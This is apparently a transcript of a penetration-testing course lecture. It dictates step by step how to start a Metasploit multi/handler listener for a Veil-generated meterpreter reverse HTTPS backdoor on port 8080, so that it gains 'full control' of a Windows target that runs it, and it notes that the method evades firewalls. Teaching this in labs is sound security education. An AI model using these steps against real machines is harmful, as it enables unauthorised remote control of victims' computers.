Now, the backdoor that we created uses a reverse payload. So, like I said before, it does not open a port in the target computer. It actually connects from the target computer to our computer. And by doing that, it'll bypass firewalls and it'll look less suspicious. So for this to work, we need to open a port in our computer so that the backdoor can connect from the target computer to us on that port. So if you remember, when I created the backdoor, I set the port to 8080. So I need to open that port in my Kali machine so that when the target person executes the backdoor can connect back to me on port 8080. So I'm just going to write the name of the payload that we used because that's very important when you're listening for incoming connections. So we used a payload that's written in Go, and that was a meterpreter rev HTTPS, which is a reverse HTTPS payload. Now this is not a command, I'm just going to write it in here so just that you keep this in mind. And we used port 8080 for the reverse connection. So these are the most important things to keep in mind when listening for incoming connections. So I'm going to split the screen and I'm going to listen for incoming connections in here. And to do that, I'm going to use the Metasploit framework. Now to run Metasploit, all you have to do is just run MSF console. Now Metasploit framework is a huge framework for penetration testing. So the meterpreter backdoor or the meterpreter payload that Vil created for us is actually programmed by the people who made Metasploit. That's why we're using Metasploit to listen for incoming connections. So Vil Evasion actually uses Metasploit to generate the backdoor that we chose in the previous video. So to listen for incoming connections, we're going to use a module in Metasploit. Now Metasploit, as I said, is a huge framework and it has a lot of modules. So the module that we're interested in is a module that allows us to listen for incoming connections from a meterpreter payload. To use that module, we're going to do use to use a module, and then we're going to specify the module name. And the module name is exploit multi-handler. Okay, so the command we're using is use to specify the module that we want to use, and we're using a module called exploit multi-handler that allows us to listen for incoming connections. I'm gonna hit enter, and I was already in that module, so you can see that nothing changed for me, but for you, you should navigate to that module. And I'm gonna do show options to see the options that I can set for this module. And you can see that you can specify different options for it. The most important thing that you want to specify is the payload. So you can see in here for me, it's set to Windows Meterpreter Reverse TCP. And if you remember what we used a Meterpreter Reverse HTTPS, not TCP. So you want to change this. The first part is fine because our target is going to be Windows, but you want to change the reverse TCP to reverse HTTPS. And you can change that exactly the same way that we did with Vil Evasion. So you type in set, you put the option name that you want to change, and we want to change the option for the payload. So we're going to say payload. And we're going to set that to Windows Meterpreter Reverse HTTPS this time. Okay, so we're doing set to set an option. We're setting the payload to Windows Meterpreter Reverse HTTPS. Now this payload should correspond to the payload that you chose in the backdoor. So in the backdoor we used Meterpreter Reverse HTTPS. That's why in here we're using Reverse HTTPS as well. If you chose Reverse HTTP, then set this to Reverse HTTP. If you use Reverse TCP, then set this to Reverse TCP, and so on. So I'm gonna hit enter for this, and that's gonna do it for me. And if I do show options now, you'll see the payload changed to Windows Meterpreter Reverse HTTPS. Now the same concept applies for all the other options. So you want to set the lhost to our IP address, and you can see that this is already set to the right one. So if it was wrong for you, all you have to do is just do set lhost and put your IP address. So you can get the IP address using ifconfig like I showed you in the previous lecture. So for me it's 10.20.14.213, and again this is the same IP that I used when I created my backdoor. And same goes for the port. You want to set the same port. So we're going to do set lport to 8080 because that's the port that we used when we generated the backdoor. So again, the main idea with this is you want to set the payload, the lhost, and the port to exactly the same options that you chose when you created the backdoor. Once done with that, we're going to do show options one more time. And you'll see that I have my payload set properly, Windows Meterpreter Reverse HTTPS. I have my lhost and I have my lport. And all of that is done properly. So all we have to do now is just do exploit. And now Metasploit is waiting for connections, as you can see, on port 8080 and on my IP address, which is 10.20.14.213. So now if anybody opens the backdoor that we created in the previous lecture, because it's a reverse backdoor, the backdoor will try to connect to the IP that we set when we created the backdoor, which was 10.20.14.213, and it'll try to connect on port 8080. It's going to come to this computer, and this computer is already waiting for that connection from this multi-handler module. So the connection will be established, and then I'll be able to control the target computer, and I'll basically hack it and have full control over it. Now in the next lecture, I'll show you a very basic way to deliver the backdoor to the target computer and how to test the backdoor and make sure that it works properly.